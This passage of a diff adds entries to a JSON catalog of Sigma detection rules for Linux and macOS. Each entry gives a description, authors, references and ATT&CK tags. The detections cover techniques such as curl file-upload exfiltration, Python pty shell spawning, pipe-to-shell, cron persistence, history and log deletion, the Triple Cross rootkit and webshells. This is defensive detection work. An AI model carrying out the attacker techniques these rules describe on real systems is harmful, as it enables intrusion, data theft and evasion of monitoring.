"676381a6-15ca-4d73-a9c8-6a22e970b90d", + "value": "Local Groups Discovery - Linux" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_network_service_scanning.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", + "value": "Linux Network Service Scanning" + }, + { + "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/06", + "falsepositive": [ + "Administrators or installed processes that leverage nohup" + ], + "filename": "proc_creation_lnx_nohup.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gtfobins.github.io/gtfobins/nohup/", + "https://en.wikipedia.org/wiki/Nohup", + "https://www.computerhope.com/unix/unohup.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" + ], + "tags": "No established tags" + }, + "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", + "value": "Nohup Execution" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider ExecuteScript." + ], + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", + "value": "OMIGOD SCX RunAsProvider ExecuteScript" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." + ], + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand" + }, + { + "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_process_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", + "value": "Process Discovery" + }, + { + "description": "Detects setting proxy configuration", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_proxy_connection.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1090/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1090" + ] + }, + "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", + "value": "Connection Proxy" + }, + { + "description": "Detects python spawning a pretty tty", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_python_pty_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", + "value": "Python Spawning Pretty TTY" + }, + { + "description": "Detects the enumeration of other remote systems.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/22", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_remote_system_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", + "value": "Linux Remote System Discovery" + }, + { + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_schedule_task_job_cron.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ] + }, + "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", + "value": "Scheduled Cron Task/Job - Linux" + }, + { + "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_security_software_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", + "value": "Security Software Discovery - Linux" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_security_tools_disabling.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", + "value": "Disabling Security Tools" + }, + { + "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_services_stop_and_disable.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", + "value": "Disable Or Stop Services" + }, + { + "description": "Detects suspicious change of file privileges with chown and chmod commands", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/16", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_setgid_setuid.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", + "https://attack.mitre.org/techniques/T1548/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", + "value": "Setuid and Setgid" + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ] + }, + "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", + "value": "Sudo Privilege Escalation CVE-2019-14287" + }, + { + "description": "Detects chmod targeting files in abnormal directory paths.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/03", + "falsepositive": [ + "Admin changing file permissions." + ], + "filename": "proc_creation_lnx_susp_chmod_directories.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", + "value": "Chmod Suspicious Directory" + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "filename": "proc_creation_lnx_susp_curl_fileupload.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://curl.se/docs/manpage.html", + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ] + }, + "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", + "value": "Suspicious Curl File Upload - Linux" + }, + { + "description": "Detects a suspicious curl process start on linux with set useragent options", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_lnx_susp_curl_useragent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://curl.se/docs/manpage.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "b86d356d-6093-443d-971c-9b07db583c68", + "value": "Suspicious Curl Change User Agents - Linux" + }, + { + "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_history_delete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ] + }, + "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", + "value": "History File Deletion" + }, + { + "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_history_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ] + }, + "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", + "value": "Print History File Contents" + }, + { + "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/14", + "falsepositive": [ + "Legitimate software that uses these patterns" + ], + "filename": "proc_creation_lnx_susp_interactive_bash.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" + ], + "tags": "No established tags" + }, + "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", + "value": "Interactive Bash Suspicious Children" + }, + { + "description": "Detects java process spawning suspicious children", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_susp_java_children.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.tecmint.com/different-types-of-linux-shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", + "value": "Suspicious Java Children Processes" + }, + { + "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/14", + "falsepositive": [ + "Legitimate software that uses these patterns" + ], + "filename": "proc_creation_lnx_susp_pipe_shell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "880973f3-9708-491c-a77b-2a35a1921158", + "value": "Linux Shell Pipe to Shell" + }, + { + "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_recon_indicators.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004", + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", + "value": "Linux Recon Indicators" + }, + { + "description": "Detects system information discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_system_info_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", + "value": "System Information Discovery" + }, + { + "description": "Detects usage of system utilities to discover system network connections", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_system_network_connections_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", + "value": "System Network Connections Discovery - Linux" + }, + { + "description": "Detects enumeration of local network configuration", + "meta": { + "author": "Ömer Günal and remotephone, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_system_network_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", + "value": "System Network Discovery - Linux" + }, + { + "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ] + }, + "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", + "value": "Triple Cross eBPF Rootkit Execve Hijack" + }, + { + "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1014" + ] + }, + "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", + "value": "Triple Cross eBPF Rootkit Install Commands" + }, + { + "description": "Detects suspicious sub processes of web server processes", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali (update)", + "creation_date": "2021/10/15", + "falsepositive": [ + "Web applications that invoke Linux command line tools" + ], + "filename": "proc_creation_lnx_webshell_detection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", + "value": "Linux Webshell Indicators" + }, + { + "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/23", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "file_event_macos_emond_launch_daemon.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", + "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.014" + ] + }, + "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", + "value": "MacOS Emond Launch Daemon" + }, + { + "description": "Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "file_event_macos_startup_items.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1037.005" + ] + }, + "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", + "value": "Startup Items" + }, + { + "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Application installers might contain scripts as part of the installation process." + ], + "filename": "proc_creation_macos_applescript.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.002" + ] + }, + "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", + "value": "MacOS Scripting Interpreter AppleScript" + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_base64_decode.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", + "value": "Decode Base64 Encoded Text -MacOs" + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate script work" + ], + "filename": "proc_creation_macos_binary_padding.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", + "value": "Binary Padding - MacOS" + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_change_file_time_attr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", + "value": "File Time Attribute Change" + }, + { + "description": "Detects deletion of local audit logs", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_clear_system_logs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", + "value": "Indicator Removal on Host - Clear Mac System Logs" + }, + { + "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_create_account.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + ], + 